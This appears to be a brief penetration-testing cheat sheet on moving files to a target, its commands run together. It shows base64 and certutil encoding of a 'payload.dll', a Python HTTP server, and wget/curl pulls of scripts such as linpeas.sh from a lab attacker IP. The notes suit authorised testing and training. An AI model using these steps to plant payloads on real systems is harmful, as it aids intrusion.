Linux:
base64 -w0 <file> #Encode filebase64 -d <file> #Decode file
Windows:
certutil -encode payload.dll payload.b64certutil -decode payload.b64 payload.dll
Linux
# Where the file ispython -m SimpleHTTPServer 80 # Python2python3 -m http.server 80 # Python3# Where you want the filewget 10.10.14.27/file.shcurl 10.10.14.27/linpeas.sh --output test.sh